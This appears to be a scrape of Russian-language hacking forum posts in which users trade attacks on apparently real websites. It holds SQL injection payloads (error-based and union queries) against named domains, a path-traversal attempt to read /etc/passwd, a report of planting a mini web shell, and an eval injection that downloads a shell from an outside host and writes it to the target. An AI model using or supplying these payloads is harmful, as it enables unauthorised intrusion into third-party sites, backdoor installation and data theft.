http://logvinov.info/about/0/0/0/1'or(1,2)=(select*from(select(name_const(version(),1)),name_const(version(),1))a)and(1)='1
ребят, извиняюсь за жутко странный вопрос, но не мог бы кто объяснить, как искать sql-injection в ручную? ) подробных faq не видел, желательно человек чтобы ) если согласен кто помочь начинающему, отпишите пожалуйста в пм свою icq\jabber
Нашел на неком сайте LFI Code: http://******.ru/book_php.php?id=adminpidaras.php Пытаюсь крутить Code: http://******.ru/book_php.php?id=../../../../../../../../../../../../../../../../../../../etc/passwd Поставляю %00, и все-равно ошибка. Подскажите что я делаю не так?
Code: http://www.novstan.ru/search/?str=%')or(1)group%2F%2A%2A%2Fby(concat(version(),0x00,floor(rand(0)*2)))having(min(0)or(1))%23
http://www.serdan.com/html/i_portals/index.php?p_origin=internal&p_name=content&p_id=MI-91 Оракл, я не силен
Там нет иньекции! Нашел на поддомене. PHP: http://intranet.serdan.com.co/DATAofertas/index.php?perfilId=2 union all select null,null,null,null-- Version: User: Database:
Залил мини шелл. Все ок. PHPINFO показывает. Делаю запрос Ничего не показывает. Начал гуглить... Перекодировал адрес сайта в BASE64. Опять нет шелла( allow_url_fopen On allow_url_include Off file_uploads On
to aydin-ka Если я правильно тебя понял, то $a = eval($_GET['a']); Code: http://site.com?index.php?a=file_put_contents("shell.php", file_get_contents("http://site/shell.txt"));
